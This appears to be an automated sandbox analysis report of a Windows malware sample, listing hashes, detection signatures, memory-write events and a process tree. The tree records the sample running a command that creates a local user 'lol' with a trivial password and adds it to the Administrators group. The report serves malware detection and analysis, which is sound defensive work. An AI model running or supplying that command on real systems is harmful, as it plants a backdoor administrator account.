Analysis
max time kernel: 40s
max time network: 44s
platform: windows7_x64
resource: win7-20220414-en
submitted: 08-06-2022 04:21
Static task: static1

Behavioral task: behavioral1
  Sample: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
  Resource: win7-20220414-en
  Platform: windows7_x64
  0 signatures
  0 seconds

Behavioral task: behavioral2
  Sample: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
  Resource: win10v2004-20220414-en
  Platform: windows10-2004_x64
  0 signatures
  0 seconds
General
Target: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
Size: 72KB
MD5: 1f299506e50a82c1111969d4bf76e7ea
SHA1: 9758832ef27dc5b099417f505da7060dd9f7695e
SHA256: 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8
SHA512: a960f7751d479101ce4d64ac0bbdde1700c7cbeacdd9a6c6f15faaef959a582934cc6053ef2d4fab2c408581a3a477dab02c38d191682b9ca9f894058dd49673
Score: 9/10
Malware Config
Signatures
- Grants admin privileges (1 TTPs): uses net.exe to modify the user's privileges.
- Runs net.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
Processes:
description                        | pid  | process                                                                  | target process
PID 1672 wrote to memory of 1796   | 1672 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 1672 wrote to memory of 1796   | 1672 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 1672 wrote to memory of 1796   | 1672 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 1672 wrote to memory of 1796   | 1672 | 1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe | cmd.exe
PID 1796 wrote to memory of 912    | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 912    | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 912    | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 912    | 1796 | cmd.exe                                                                  | net.exe
PID 912 wrote to memory of 1484    | 912  | net.exe                                                                  | net1.exe
PID 912 wrote to memory of 1484    | 912  | net.exe                                                                  | net1.exe
PID 912 wrote to memory of 1484    | 912  | net.exe                                                                  | net1.exe
PID 912 wrote to memory of 1484    | 912  | net.exe                                                                  | net1.exe
PID 1796 wrote to memory of 1328   | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 1328   | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 1328   | 1796 | cmd.exe                                                                  | net.exe
PID 1796 wrote to memory of 1328   | 1796 | cmd.exe                                                                  | net.exe
PID 1328 wrote to memory of 1456   | 1328 | net.exe                                                                  | net1.exe
PID 1328 wrote to memory of 1456   | 1328 | net.exe                                                                  | net1.exe
PID 1328 wrote to memory of 1456   | 1328 | net.exe                                                                  | net1.exe
PID 1328 wrote to memory of 1456   | 1328 | net.exe                                                                  | net1.exe
Processes (process tree; indentation shows parent/child depth)
C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\1a1a1f95234d0cdd46d9265c7c9e0c6fa2836aecf98608eac0d2c6e1247e4ba8.exe"
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\cmd.exe
    Command line: cmd.exe /c net user lol j /ADD && net localgroup Administrators lol /ADD
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\net.exe
      Command line: net user lol j /ADD
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 user lol j /ADD
    C:\Windows\SysWOW64\net.exe
      Command line: net localgroup Administrators lol /ADD
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators lol /ADD